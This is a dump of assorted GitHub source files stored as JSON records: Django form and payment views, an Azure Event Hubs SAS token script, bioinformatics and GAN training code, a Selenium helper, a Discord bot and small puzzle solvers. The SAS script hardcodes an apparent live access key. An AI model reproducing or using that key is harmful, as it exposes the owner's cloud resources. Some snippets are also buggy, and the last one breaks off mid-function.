+{"seq_id":"18471565575","text":"class Solution:\r\n def carFleet(self, target, position, speed):\r\n output, maximum = 0\r\n times = [float(target - p) / s for p, s in sorted(zip(position, speed),reverse = True)] \r\n for time in times:\r\n if time > maximum:\r\n maximum = time\r\n output += 1\r\n\r\n return output\r\n","repo_name":"KnightDanny/A2SV","sub_path":"Car Fleet.py","file_name":"Car Fleet.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9781558230","text":"from audioop import reverse\nimport json\nimport math\nfrom wsgiref import headers\nfrom xml.dom import ValidationErr\nfrom numpy import append\nfrom .models import Choice_Model, darmangar, info, darmanjo_form\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse\nfrom django.shortcuts import render, HttpResponseRedirect, HttpResponse, get_object_or_404, get_list_or_404, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import TemplateView, CreateView,FormView, DetailView\nfrom .forms import infoss, darmanjo_formss\nfrom .extentions.excel_validation import exel_reader\nimport xlrd\nfrom django.utils.crypto import get_random_string\nimport random\nfrom pypep import Pasargad, ApiError\nimport pandas as pd\nimport datetime\n\nclass home(TemplateView):\n template_name = \"forms/home.html\"\n\n\n\n#in yek method form baraye in ast ke file excel ra daryaft konad\ndef get_name(request):\n if request.method == 'POST':\n form = infoss(request.POST, request.FILES)\n if form.is_valid():\n upl = form.cleaned_data['upl']\n form.save()\n\n wb = xlrd.open_workbook(\"media/upload-file/\" + str(upl))\n sh = wb.sheet_by_index(0)\n columns = sh.ncols - 2\n num_rows = sh.nrows - 1\n print(num_rows)\n if sh.cell_value(0,0) == \"نام\" and sh.cell_value(0,1) == \"خانوادگی\" and sh.cell_value(0,2) == \"موبایل\" and sh.cell_value(0,3) == \"ایمیل\":\n for i in range(num_rows):\n the_slug = get_random_string(3,'0123456789') # 8 characters, only digits. \n the_slugs = get_random_string(3,'0123456789')\n m = str(the_slug) + \"-\" + str(the_slug)\n o = i + 1\n\n d = sh.cell_value(o,2)\n\n a = info.objects.create( mobile=d)\n return HttpResponse(\"فایل با موفقیت ثبت شد\")\n else:\n return HttpResponse(\"مشکلی در فایل وجود دارد احتمالا از قوانین فایل پیروی نکردید\")\n #return HttpResponseRedirect('home')\n else:\n form = infoss()\n\n return render(request, 'forms/form.html', {'form': form})\n\n\n\nclass Submit_Form(TemplateView):\n template_name = \"forms/submit.html\"\n\n\n\n\n#function form baraye form darmanjo\ndef detailsick(request, slug):\n deta = get_object_or_404(info, slug=slug)\n detas = info.objects.get(slug=slug)\n darm = None\n informations = None\n page_obj = None\n darms = []\n rel_info = None\n list_count =[]\n #form\n if request.method == \"POST\":\n form = darmanjo_formss(request.POST)\n a = request.POST\n if form.is_valid():\n global talk_about\n talk_about = form.cleaned_data['talk_about']\n form.save(commit=False)\n print(\"aa\"+str(rel_info))\n darm = darmangar.objects.filter(keyword__in=talk_about.split())\n count = darm.count()\n half_count = math.ceil(count/2)\n print(half_count)\n\n for x in range(half_count):\n list_count.append(x+1)\n\n print(list_count)\n print(darms)\n informations = darmanjo_form.objects.create(information=deta, talk_about=talk_about)\n else:\n form = darmanjo_formss()\n return render(request, \"forms/detailsick.html\", {'deta':deta,'detas':detas,'form':form,'darm':darm,'page_obj':page_obj,'darms':darms, 'list_count':list_count, 'informations':informations})\n\n#detail form\ndef detailform(request, slug, pk, id):\n #for url filter\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n fname = None\n lname = None\n deta = info.objects.filter(slug=slug)\n deta1 = info.objects.get(slug=slug)\n darman = get_object_or_404(darmangar, pk=pk)\n detass = info.objects.get(slug=slug)\n c = info.objects.get(slug=slug)\n #informations = darmanjo_form.objects.update(talk_about=detas,rel_info=darman, information = detas)\n informations = darmanjo_form.objects.filter(information__fname__icontains=deta1.fname, information__lname__icontains=deta1.lname,id=darmanjo_fo.id).update(rel_info=darman, information=detass)\n \n return render(request, 'forms/detailform.html', {'deta':deta,'darman':darman,'detass':detass,'darmanjo_fo':darmanjo_fo})\n\n\nclass Unsubmit_Payment(TemplateView):\n template_name = \"forms/Unsubmit.html\"\n\n#payment\ndef payment(request, slug,id):\n\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n date = datetime.datetime.now()\n global invoice_number\n payment_price = darmangar.objects.get(slug=slug)\n global amount\n amount = int(payment_price.price)\n print(payment_price)\n url = f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n pasargad = Pasargad(4916435, 2148370, url, 'cert.xml')\n payment_url = pasargad.redirect(\n amount=amount,\n invoice_number=random.randint(0, 9000000),\n invoice_date=str(date),\n )\n url = 'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n return HttpResponseRedirect(payment_url, url)\n\ndef check_transaction(request,slug,id):\n payment_price = darmangar.objects.get(slug=slug)\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n global amount\n amount = int(payment_price.price)\n print(payment_price)\n pasargad = Pasargad(4916435, 2148370, 'http://127.0.0.1:8000/home', 'cert.xml')\n print(\"okey\")\n TransactionReferenceID = request.GET.get('tref')\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n print(TransactionReferenceID)\n print(InvoiceNumber)\n print(InvoiceDate)\n try:\n response = pasargad.check_transaction(\n reference_id=TransactionReferenceID,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n \n with open('data.txt', 'a') as f:\n data = json.dumps(response)\n data1 = str(data)\n f.write(data1+\"\\n\")\n print(\"okey\")\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=amount,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n informations = darmanjo_form.objects.filter(id=darmanjo_fo.id).update(payment=True)\n print(\"sabt shod\")\n #informations = darmanjo_form.objects.create()\n return HttpResponseRedirect(reverse('form:home'))\n except Exception:\n return HttpResponseRedirect(reverse('form:Unsubmit'))\n\n\n #response = json.loads(response.read().decode('utf-8'))\n\n\n#f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n#f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{deta.pk}/{deta.fname}/{darmanjo_fo.id}/'\n\n\n\"\"\"\n if request.method == 'GET':\n informations = darmanjo_form.objects.filter(id=darmanjo_fo.id).update(payment=True)\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=amount,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n #informations = darmanjo_form.objects.create()\n return HttpResponse(\"okey\")\n except Exception:\n return HttpResponse(\"okey\")\n\"\"\"\n\"\"\"\n pasargad = Pasargad(4916435, 2148370, f'http://127.0.0.1:8000/home', 'cert.xml')\n response = pasargad.check_transaction(\n reference_id=request.GET['tref'],\n invoice_number=request.GET['iN'],\n invoice_date=request.GET['iD'],\n )\n with open('data.txt', 'a') as f:\n data = json.dumps(response)\n data1 = str(data)\n f.write(data1+\"\\n\")\n \n data = json.dumps(response)\n print(data)\n x = data.get(\"IsSuccess\")\n print(\"<--------------------------> \"+x)\n if x == \"True\":\n if request.method == 'GET':\n informations = darmanjo_form.objects.filter(information__fname__icontains=deta1.fname, information__lname__icontains=deta1.lname,id=darmanjo_fo.id).update(payment=True)\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=\"17000\",\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n #informations = darmanjo_form.objects.create()\n return HttpResponse(\"okey\")\n else:\n return HttpResponse(\"False\")\n\n\"\"\"","repo_name":"javadhoseeinzade/first-project","sub_path":"Forms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"33634441905","text":"#!/bin/python\nimport time\n#import urllib\nfrom urllib.parse import urlparse\nimport hmac\nimport hashlib\nimport base64\n\ndef get_auth_token(sb_name, eh_name, sas_name, sas_value):\n \"\"\"\n Returns an authorization token dictionary \n for making calls to Event Hubs REST API.\n \"\"\"\n uri = urlparse(f\"https://{sb_name}.servicebus.windows.net/{eh_name}\")\n \n sas = sas_value.encode('utf-8')\n expiry = str(int(time.time() + 10000))\n string_to_sign = f\"{uri}\\n{expiry}\".encode('utf-8')\n signed_hmac_sha256 = hmac.HMAC(sas, string_to_sign, hashlib.sha256)\n signature = urlparse(base64.b64encode(signed_hmac_sha256.digest()))\n return {\"sb_name\": sb_name,\n \"eh_name\": eh_name,\n \"token\":'SharedAccessSignature sr={}&sig={}&se={}&skn={}' \\\n .format(uri, signature, expiry, sas_name)\n }\n\nprint ( get_auth_token('sapps-eventdriven-servicebus', 'upper-case', 'listner', 'ZlgMkVC4TmEMpS8QFPth1TrdHC98mb1YL+ASbJuUQeU=')['token'] )\n\n","repo_name":"wkaczurba/wkaczurba.github.io","sub_path":"docs/azure/sas/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8541002866","text":"\"\"\"An example with GIF generation at the end. How cool is that!\n\nThis example requires the Moviepy library installed (pip install moviepy).\n\n\"\"\"\nfrom Bio import Entrez, SeqIO\nimport moviepy.editor as mpe\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nimport matplotlib.pyplot as plt\nfrom dna_features_viewer import BiopythonTranslator, CircularGraphicRecord\n\n# DOWNLOAD THE PLASMID's RECORD FROM NCBI\n\nhandle = Entrez.efetch(\n db=\"nucleotide\", id=1473096477, rettype=\"gb\", retmode=\"text\"\n)\nrecord = SeqIO.read(handle, \"genbank\")\n\n# CREATE THE GRAPHIC RECORD WITH DNA_FEATURES_VIEWER\n\ncolor_map = {\n \"rep_origin\": \"yellow\",\n \"CDS\": \"orange\",\n \"regulatory\": \"red\",\n \"misc_recomb\": \"darkblue\",\n \"misc_feature\": \"lightblue\",\n}\ntranslator = BiopythonTranslator(\n features_filters=(lambda f: f.type not in [\"gene\", \"source\"],),\n features_properties=lambda f: {\"color\": color_map.get(f.type, \"white\")},\n)\ntranslator.max_line_length = 15\ngraphic_record = translator.translate_record(\n record, record_class=CircularGraphicRecord\n)\ngraphic_record.labels_spacing = 15\n\n# ANIMATE INTO A GIF WITH MOVIEPY\n\nduration = 5\n\n\ndef make_frame(t):\n top_nucleotide_index = t * graphic_record.sequence_length / duration\n graphic_record.top_position = top_nucleotide_index\n ax, _ = graphic_record.plot(figure_width=8, figure_height=11)\n ax.set_ylim(top=2)\n np_image = mplfig_to_npimage(ax.figure)\n plt.close(ax.figure)\n return np_image\n\n\nclip = mpe.VideoClip(make_frame, duration=duration)\nsmall_clip = clip.crop(x1=60, x2=-60, y1=100, y2=-100).resize(0.5)\nsmall_clip.write_gif(\"example_with_gif.gif\", fps=15)\n","repo_name":"Edinburgh-Genome-Foundry/DnaFeaturesViewer","sub_path":"examples/example_with_gif.py","file_name":"example_with_gif.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":508,"dataset":"github-code","pt":"16"}
+{"seq_id":"30584530761","text":"import os\n\nfrom datetime import datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support.select import Select\nimport time\nfrom common.file import CommonFile\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nclass BaseWebDriver:\n def __init__(cls):\n pass\n \n driver: WebDriver = None\n \n @classmethod\n def start_driver(cls):\n options = webdriver.ChromeOptions()\n options.add_argument('--lang=ja-JP')\n options.add_experimental_option('detach', True)\n cls.driver = webdriver.Chrome(ChromeDriverManager().install(),options=options)\n cls.driver.maximize_window()\n\n @classmethod\n def stop_driver(cls):\n cls.driver.quit()\n \n @classmethod\n def log_current_url(cls):\n print('current URL: ', cls.driver.current_url)\n\n @classmethod\n def get_screenshot(cls, id: str = \"temp\", \n prefix: str = \"\", suffix: str = \"\"):\n now = datetime.now()\n prefix = f\"{prefix}_\" if prefix else \"\"\n suffix = f\"_{suffix}\" if suffix else \"\"\n file_name = f\"{id}_{prefix}{now.strftime('%Y%m%d%H%M%S%f')}{suffix}.png\"\n dir_path = f\"{os.getcwd()}/screenshots/\"\n file_path = f\"{dir_path}{file_name}\"\n \n if not CommonFile.exists_path(dir_path):\n CommonFile.make_directory(dir_path)\n\n print(f'screenshot:{file_path}')\n screenshot = cls.driver.get_screenshot_as_png()\n \n CommonFile.make(file_path, screenshot, mode='wb+')\n\n @classmethod\n def switch_to_window(cls, index=-1):\n # seleniumが速すぎるため少し待つ\n cls.wait(0.5)\n \n windows = cls.driver.window_handles\n if index == -1:\n index = len(windows) - 1\n cls.driver.switch_to.window(windows[index])\n\n @classmethod\n def find_wait_clickable_element(cls, selector, wait_seconds=5):\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.element_to_be_clickable(selector))\n return elm\n \n @classmethod\n def find_wait_located_element(cls, selector, wait_seconds=10):\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.visibility_of_element_located(selector))\n return elm\n\n @classmethod\n def wait_loading(cls, selector, wait_seconds=10):\n # 判定用のエレメントが読込されるまで待機する\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.visibility_of_element_located(selector))\n \n @classmethod\n def wait(cls, wait_seconds=1):\n time.sleep(wait_seconds)\n \n @classmethod\n def clear_text(cls, elm: WebElement):\n elm.clear()\n \n @classmethod\n def input_text(cls, elm: WebElement, value):\n cls.clear_text(elm)\n elm.send_keys(value)\n \n @classmethod\n def input_text_add(cls, elm: WebElement, value):\n elm.send_keys(value)\n \n @classmethod\n def input_checkbox(cls, elm: WebElement, is_check: bool):\n is_checked = elm.is_selected()\n if is_checked == is_check:\n return\n elm.click()\n\n @classmethod\n def input_select(cls, elm: WebElement, value):\n Select(elm).select_by_value(value)\n \n @classmethod\n def input_radio(cls, name: str , value):\n elm_list = cls.driver.find_elements(by=By.NAME, value=name)\n elm = next(filter(lambda x:x.get_attribute('value') == value, elm_list))\n elm.click()\n \n @classmethod\n def select_radio(cls, elm: WebElement):\n elm.click()\n ","repo_name":"kazuki-ikeya/seleniumSample","sub_path":"python/src/base/drivers/base_web_driver.py","file_name":"base_web_driver.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25821361110","text":"from uplogic.nodes import ULActionNode\nfrom uplogic.nodes import ULOutSocket\nfrom uplogic.ui import Canvas\n\n\nclass ULCreateUICanvas(ULActionNode):\n def __init__(self):\n ULActionNode.__init__(self)\n self.condition = None\n self._canvas = None\n self._done = False\n self.OUT = ULOutSocket(self, self._get_done)\n self.CANVAS = ULOutSocket(self, self._get_canvas)\n\n def _get_done(self):\n return self._done\n\n def _get_canvas(self):\n return self._canvas\n\n def evaluate(self):\n self._done = False\n if not self.get_input(self.condition):\n return\n self._canvas = Canvas()\n self._done = True\n \n","repo_name":"UPBGE/uplogic","sub_path":"uplogic/nodes/actions/createuicanvas.py","file_name":"createuicanvas.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"70651876167","text":"import asyncio\nimport nextcord\nfrom nextcord.ext import commands\nfrom typing import Union\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom constantes import tokenReact\n\ndef main() -> None:\n intentsBot = nextcord.Intents.default()\n intentsBot.members = True\n intentsBot.messages = True\n intentsBot.message_content = True\n bot = commands.Bot(command_prefix=\",\", help_command=None, intents = intentsBot)\n\n @bot.command(name=\"react\")\n async def react(ctx, *emojis: Union[nextcord.Emoji, str]):\n reference = ctx.message.reference\n\n if reference:\n msg = await ctx.channel.fetch_message(reference.message_id)\n for emoji in emojis:\n await msg.add_reaction(emoji)\n\n await ctx.message.delete()\n\n loop = asyncio.get_event_loop()\n loop.create_task(bot.start(tokenReact))\n loop.run_forever()\n\nmain()\n","repo_name":"fabnem12/squadro-bot","sub_path":"discordUtils/reactbot.py","file_name":"reactbot.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"}
+{"seq_id":"11890741601","text":"def from_snafu(snafu):\n return sum({ '=': -2, '-': -1, '0': 0, '1': 1, '2': 2 }[v] * (5 ** i) for i, v in enumerate(reversed(list(snafu))))\n\ndef to_snafu(number):\n # First convert the number to base 5\n digits = []\n while number:\n digits.append(number % 5)\n number //= 5\n digits.append(0)\n\n # Convert overflow 3s, 4s and 5s to next digit\n for i, digit in enumerate(digits):\n if digit > 2: digits[i] -= 5; digits[i+1] += 1\n\n if digits[-1] == 0: digits = digits[:-1]\n\n return ''.join([{ -2: '=', -1: '-', 0: '0', 1: '1', 2: '2' }[x] for x in reversed(digits)])\n\nwith open(\"./day25/input.txt\") as f:\n lines = f.read().splitlines()\n\npart1 = to_snafu(sum([from_snafu(x) for x in lines]))\nprint(part1)\n","repo_name":"craigfe/advent-of-code-2022","sub_path":"day25/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12446040898","text":"from __future__ import annotations\nfrom django.contrib.auth import get_user_model\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.core.mail import send_mail\nimport uuid\nimport time\nimport random\nfrom ..dto.create_user import CreateUserDTO\nfrom ..exceptions import (\n ConfirmationCodeExpired,\n ConfirmationCodeDoesNotExist\n)\nfrom ...models import EmailConfirmationCode\n\n\ndef add_user(data: CreateUserDTO) -> None:\n user_model = get_user_model()\n created_user = user_model.objects.create_user(username=data.username,\n email=data.email,\n password=data.password,\n is_active=False)\n\n confirmation_code = str(uuid.uuid4())\n code_expiration_time = int(time.time()) + settings.CONFIRMATION_CODE_LIFETIME\n confirmation_url = settings.SERVER_HOST + reverse('confirm') + f'?code={confirmation_code}'\n EmailConfirmationCode.objects.create(\n user=created_user,\n expiration=code_expiration_time,\n code=confirmation_code\n )\n send_mail(\n subject='Confirm your email',\n message=f\"Please confirm your email by clicking the link below:\\n\\n{confirmation_url}\",\n from_email=settings.EMAIL_FROM,\n recipient_list=[data.email]\n )\n\n\ndef confirmation_user(confirmation_code: str) -> None:\n try:\n data = EmailConfirmationCode.objects.get(code=confirmation_code)\n\n except EmailConfirmationCode.DoesNotExist:\n raise ConfirmationCodeDoesNotExist('Confirmation Code Does Not Exist')\n\n if time.time() > data.expiration:\n raise ConfirmationCodeExpired\n\n user = data.user\n user.is_active = True\n user.save()\n\n data.delete()\n","repo_name":"Anastasiia323/blog_app","sub_path":"sourse/blogging_app/core/busines_logic/servises/create_user.py","file_name":"create_user.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38134018540","text":"import random\nimport math\n\n#Tournament Pools\nplayernum = int(input(\"How many players are competing: \"))\npoolnum = int(input(\"How many pools: \"))\nroundnum = int(input(\"How many rounds: \"))\nfinalnum = int(input(\"How many people in finals: \"))\nsplitnum = math.ceil(playernum / poolnum)\n\ndef createrecords(playernum):\n matchhistory = {}\n for player in range(1, playernum + 1):\n matchhistory[player] = [0, 0, 0] #games, wins, points\n return matchhistory\n\ndef splitlist(poolnum, splitnum, players, pools):\n for num in range(poolnum):\n print(players[splitnum * num: splitnum * (num+1)])\n pools.append(players[splitnum * num: splitnum * (num+1)])\n\ndef poollist(pools, splitnum):\n totalmatch = 0\n for group in pools:\n poolmatch = []\n print()\n print(\"Pool \" + str(pools.index(group) + 1) + \":\")\n for num in range(0, len(group)):\n for x in range(num + 1, len(group)):\n poolmatch.append([group[x], group[num]])\n totalmatch += 1\n poolmatch = random.sample(poolmatch, len(poolmatch))\n for num in range(len(poolmatch)):\n print(\"Match \" + str(num + 1) + \": \" + str(poolmatch[num][0]) + \" vs \" + str(poolmatch[num][1]))\n if len(poolmatch) == 0:\n print(\"No matches for this pool!\")\n return totalmatch\n \ndef matchresult(matchhistory):\n #draws\n confirm = False\n while not confirm:\n print(\"Please enter match stats!\")\n draws = input(\"Was the match a draw? Type Y or N.\")\n if draws is \"Y\" or draws is \"y\":\n player1 = int(input(\"Player 1: \"))\n player2 = int(input(\"Player 2: \"))\n player1points = float(input(\"Player 1's Points: \"))\n player2points = float(input(\"Player 2's Points: \"))\n else:\n winner = int(input(\"Winner: \"))\n loser = int(input(\"Loser: \"))\n winnerpoints = float(input(\"Winner's Points: \"))\n loserpoints = float(input(\"Loser's Points: \"))\n query = input(\"Confirm? Type Y or N.\")\n if query is \"Y\":\n confirm = True\n else:\n confirm = False\n print(\"Match recorded!\")\n if draws is \"Y\" or draws is \"y\":\n matchhistory[player1][0] += 1\n matchhistory[player2][0] += 1\n matchhistory[player1][1] += .5\n matchhistory[player2][1] += .5\n matchhistory[player1][2] += player1points\n matchhistory[player2][2] += player2points\n else:\n matchhistory[winner][0] += 1\n matchhistory[winner][1] += 1\n matchhistory[loser][0] += 1\n matchhistory[winner][2] += winnerpoints\n matchhistory[loser][2] += loserpoints\n\ndef decidefinals(finalnum, matchhistory, playernum):\n criteria = {}\n finals = []\n for player in range(1, playernum + 1):\n criteria[player] = matchhistory[1] / matchhistory[0]\n gameratio = set(criteria.values())\n while finals < finalnum:\n for item in criteria:\n if criteria[item] == max(gameratio):\n del(criteria[item])\n finals.append(item)\n gameratio.remove(max(gameratio))\n \n\ndef generatematch(playernum, poolnum, roundnum, splitnum):\n matchhistory = createrecords(playernum)\n print(matchhistory)\n for num in range(roundnum):\n pools = []\n players = random.sample(range(1, playernum + 1), playernum)\n splitlist(poolnum, splitnum, players, pools)\n print()\n print(\"Round \" + str(num + 1) + \":\")\n print(pools)\n for num in range(poollist(pools, splitnum)):\n matchresult(matchhistory)\n decidefinals(finalnum, matchhistory, playernum)\n\ngeneratematch(playernum, poolnum, roundnum, splitnum)\n\n\n","repo_name":"danielkim0-highschool/Assorted-Python-Projects","sub_path":"TournamentPools.py","file_name":"TournamentPools.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25097006175","text":"#!/usr/bin/env python\n\"\"\"\n####################################################################################\n # -*- coding: utf-8 -*-\n # Author : Thomas Neuer (tneuer)\n # Creation Date : 2019-11-18 14:45:06\n # Description :\n####################################################################################\n\"\"\"\nimport os\nif \"lhcb_data2\" in os.getcwd():\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport sys\nsys.path.insert(1, \"Preprocessing\")\nsys.path.insert(1, \"TFModels\")\nsys.path.insert(1, \"TFModels/building_blocks\")\nsys.path.insert(1, \"TFModels/GAN\")\nsys.path.insert(1, \"TFModels/CGAN\")\nsys.path.insert(1, \"TFModels/CGAN/OLD\")\nsys.path.insert(1, \"Utilities\")\nimport json\nimport grid_search\n\nimport numpy as np\nimport tensorflow as tf\nif \"lhcb_data2\" in os.getcwd():\n gpu_frac = 0.3\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_frac)\n print(\"1 GPU limited to {}% memory.\".format(np.round(gpu_frac*100)))\nelse:\n gpu_options = None\n\nfrom TFModels.PGAN import create_algorithm\nimport Preprocessing.initialization as init\nfrom building_blocks.layers import logged_dense, conv2d_logged, conv2d_transpose_logged\nfrom building_blocks.layers import reshape_layer, sample_vector_layer, replicate_vector_layer\nfrom building_blocks.layers import logged_dense, conv2d_logged, conv2d_transpose_logged, residual_block, unet, unet_original, inception_block\nfrom functionsOnImages import padding_zeros\nfrom generativeModels import GenerativeModel\n\n\n############################################################################################################\n# Parameter definiton\n############################################################################################################\nparam_dict = {\n \"z_dim\": [32, 64],\n \"optimizer\": [tf.train.RMSPropOptimizer],\n \"algorithm\": [\"CGAN\"],\n \"dataset\": [\"PiplusLowerP\"],\n \"gen_steps\": [1],\n \"adv_steps\": [5],\n # \"architecture\": [\"more_unbalanced\"],\n \"architecture\": [\"unbalanced2\", \"unbalanced\"],\n \"is_patchgan\": [False],\n \"batch_size\": [8],\n \"loss\": [\"cross-entropy\", \"KL\", \"wasserstein\"],\n \"cc\": [False],\n \"lr\": [0.001],\n \"feature_matching\": [False, True],\n \"label_smoothing\": [0.95]\n}\nsampled_params = grid_search.get_parameter_grid(param_dict=param_dict, n=30, allow_repetition=True)\n\nfor params in sampled_params:\n\n activation = tf.nn.leaky_relu\n algorithm = str(params[\"algorithm\"])\n append_y = False\n architecture = str(params[\"architecture\"])\n architecture_path = \"../Architectures/CGAN/{}.json\".format(architecture)\n is_patchgan = bool(params[\"is_patchgan\"])\n loss = str(params[\"loss\"])\n is_wasserstein = loss == \"wasserstein\"\n is_cycle_consistent = bool(params[\"cc\"])\n label_smoothing = float(params[\"label_smoothing\"])\n\n batch_size = int(params[\"batch_size\"])\n dataset = str(params[\"dataset\"])\n epochs = 120\n feature_matching = bool(params[\"feature_matching\"])\n\n keep_cols = [\"x_projections\", \"y_projections\", \"real_ET\"]\n nr_test = 100\n nr_train = 50000\n\n optimizer = params[\"optimizer\"]\n learning_rate = float(params[\"lr\"])\n\n if \"lhcb_data2\" in os.getcwd():\n path_loading = \"../Data/{}/LargeSample\".format(dataset)\n path_results = \"../Results/{}\".format(dataset)\n else:\n path_loading = \"../Data/{}/Debug\".format(dataset)\n path_results = \"../Results/Test/{}\".format(dataset)\n\n reshape_z = \"none\"\n steps_adv = int(params[\"adv_steps\"])\n steps_gen = int(params[\"gen_steps\"])\n steps_log = 3\n\n padding = {\"top\":2, \"bottom\":2, \"left\":0, \"right\":0}\n x_dim = image_shape = (52+padding[\"top\"]+padding[\"bottom\"], 64+padding[\"left\"]+padding[\"right\"], 1)\n y_dim = len(keep_cols)\n z_dim = int(params[\"z_dim\"])\n\n\n ############################################################################################################\n # Network initialization\n ############################################################################################################\n\n\n if reshape_z == \"none\":\n architectures = GenerativeModel.load_from_json(architecture_path)\n architecture_gen = architectures[\"Generator\"]\n architecture_adv = architectures[\"Critic\"]\n if is_patchgan:\n architecture_adv.append([conv2d_logged, {\"filters\": 64, \"kernel_size\": 4, \"strides\": 2, \"activation\": tf.nn.leaky_relu}])\n if is_wasserstein:\n architecture_adv.append([conv2d_logged, {\"filters\": 1, \"kernel_size\": 4, \"strides\": 1, \"activation\": tf.identity}])\n else:\n architecture_adv.append([conv2d_logged, {\"filters\": 1, \"kernel_size\": 4, \"strides\": 1, \"activation\": tf.nn.sigmoid}])\n else:\n architecture_adv[-1][1][\"activation\"] = tf.nn.leaky_relu\n\n elif reshape_z == \"replicate\":\n initial_size = [7, 8]\n architecture_gen = [\n [replicate_vector_layer, {\"size\": initial_size}],\n [conv2d_transpose_logged, {\"filters\": 512, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 1, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation_last_layer}]\n ]\n elif reshape_z == \"sample\":\n initial_size = [7, 8]\n architecture_gen = [\n [sample_vector_layer, {\"size\": initial_size, \"y_dim\": len(keep_cols),\n \"rfunc\": sampling_distribution[0], \"rparams\": sampling_distribution[1]}],\n [conv2d_transpose_logged, {\"filters\": 512, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 1, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation_last_layer}]\n ]\n else:\n raise NotImplementedError(\"Wrong reshape_z method.\")\n\n if is_cycle_consistent:\n architecture_aux = [\n [tf.layers.conv2d, {\"filters\": 128, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.conv2d, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.conv2d, {\"filters\": 128, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.flatten, {}],\n [tf.layers.dense, {\"units\": z_dim+y_dim, \"activation\": tf.identity}],\n ]\n else:\n architecture_aux = None\n\n ############################################################################################################\n # Data loading\n ############################################################################################################\n if not os.path.exists(path_results):\n os.mkdir(path_results)\n\n path_saving = init.initialize_folder(algorithm=algorithm, base_folder=path_results)\n\n data, scaler = init.load_processed_data(path_loading, return_scaler=True)\n train_calo = data[\"train\"][\"Calo\"][:nr_train]\n train_tracker = data[\"train\"][\"Tracker\"][:nr_train]\n test_calo = data[\"test\"][\"Calo\"]\n test_tracker = data[\"test\"][\"Tracker\"]\n\n train_calo = padding_zeros(train_calo, **padding).reshape([-1, *image_shape])\n test_calo = padding_zeros(test_calo, **padding).reshape([-1, *image_shape])\n test_calo = test_calo[:nr_test]\n logging_calo = test_calo[:15]\n\n ##### Rescale and check that identical\n def invert_standardize_data(data, scaler, exclude=None):\n import pandas as pd\n standardized_data = data.drop(exclude, axis=1, inplace=False)\n colnames = standardized_data.columns.values\n standardized_data = 